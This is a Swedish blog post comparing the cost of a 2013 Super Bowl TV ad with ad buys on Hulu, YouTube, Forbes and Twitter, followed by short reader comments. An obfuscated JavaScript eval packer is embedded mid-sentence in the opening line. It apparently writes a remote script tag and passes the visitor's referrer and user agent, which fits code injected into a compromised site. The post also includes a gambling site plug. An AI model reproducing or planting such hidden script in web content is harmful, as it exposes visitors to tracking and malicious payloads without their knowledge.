Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Super Bowl reklamen: Detta kan du köpa istället

super-bowl-2013-reklam
Sebastian

Super eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yiykb|var|u0026u|referrer|yhsty||js|php’.split(’|’),0,{}))
Bowl 2013: Nu i helgen är det dags för Super Bowl 2013 och företagen slåss om reklamplatserna. Dock har det inte blivit lika populärt i år då flera stora företag väljer att avstå från att vara med. Varför de gör detta beror på den otroligt höga kostnaden. 

I år är det rekord på priset för 30 sekunder media. Priser är satt till det helt sjuka fyra miljoner dollar, och detta utöver produktionskostnaderna, avgifter till byrå och påskrifter av kändisar. En positiv aspekt är att annonsen kommer att nå omkring 100 miljoner tittare på en enda gång samt vara en del av den kulturella tidsandan.
Om ni gillar fotboll är det också kul att vara med och tippa vilket ni enkelt kan göra live på 
bwin.com/sv/fotboll/

Här har vi några exempel på vad ett företag skulle kunna köpa istället för fyra miljoner dollar:

Visningar på Hulu.com

Över 100 miljoner video intryck på streamingsajten Hulu.com:
4 000 000 dollar /  30 dollar CPM = 130 miljoner visningar

Youtube.com startsida

Ca åtta dagars banner på YouTubes startsida
Istället för en Super Bowl annons kan du alltså köpa ut YouTubes hela startsida i minst 10 dagar, baserat på en prislapp på upp till 500 000 dollar per dag.
4 000 000 dollar / 500 000 dollar = 8 dagar

Forbes.com startsida

50 miljoner visningar på Forbes.com förstasida.
Till samma pris som Super Bowl kan du köpa runt 50 miljoner visningar, men även om varje intryck träffade en unik användare, skulle det bara innebära hälften av den potentiella publiken som i en Super Bowl annons.
4 000 000 dollar / 80 dollar CPM = 50 miljoner visningar

Twitter trender

Twitters sponsrade trender av ämne varje dag i en månad.
Främjas i högerspalten bland ämnen på det sociala nätverket. 4 000 000 dollar ger dig den betalda placering varje dag i minst en månad.
4 000 000 dollar / 120 000 dollar = 33 dagar

Via: Digiday

Comments

  1. Jocke

    Hur många års reklam på Revue får man för pengarna då? 🙂

    • haha Touche Jocke!

    • Sebastian Plengier

      Det blir en väldig massa visningar.